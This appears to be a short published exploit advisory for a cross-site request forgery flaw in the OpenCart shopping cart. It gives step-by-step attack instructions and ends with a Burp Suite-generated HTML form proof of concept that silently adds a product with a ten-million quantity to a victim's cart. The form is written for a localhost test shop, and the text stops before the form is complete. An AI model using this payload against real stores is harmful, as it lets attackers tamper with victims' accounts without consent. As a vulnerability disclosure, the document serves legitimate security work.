# Exploit Title: OpenCart - Cross Site Request Forgery  
# Date: 12-11-2020  
# Exploit Author: Mahendra Purbia {Mah3Sec}  
# Vendor Homepage:  
# Software Link:  
# Version: OpenCart CMS -   
# Tested on: Kali Linux  
This product have the functionality which let user to add the wish-list of other user in to his/her cart. So, user A can add products to his/her wish-list and can make his/her wish-list public which let other users to see the wish-list. Now, as user B there is a button of add to cart , when you click on it that public wish-list will be added in to your cart.  
#Additional Information:  
well i found this vulnerability in Opencart based websites but they not respond so i installed a lest version of Opencart CMS and hosted on localhost with help of XAMP and then i exploited that vulnerability.  
Attack Vector:  
1. create two accounts A(attacker) & B(victim)  
2. login with A and add a product in cart and capture that particular request in burpsuite.  
3. Now change the quantity if want and then create a csrf poc of that request.  
4. Save it as .html and send it to victim. Now the product added to victims cart.  
<!-- CSRF PoC - generated by Burp Suite Professional -->  
<script>history.pushState('', '', '/')</script>  
<form action="http://localhost/shop/index.php?route=checkout/cart/add" method="POST">  
<input type="hidden" name="product_id" value="43" />  
<input type="hidden" name="quantity" value="10000000" />  
<input type="submit" value="Submit request" />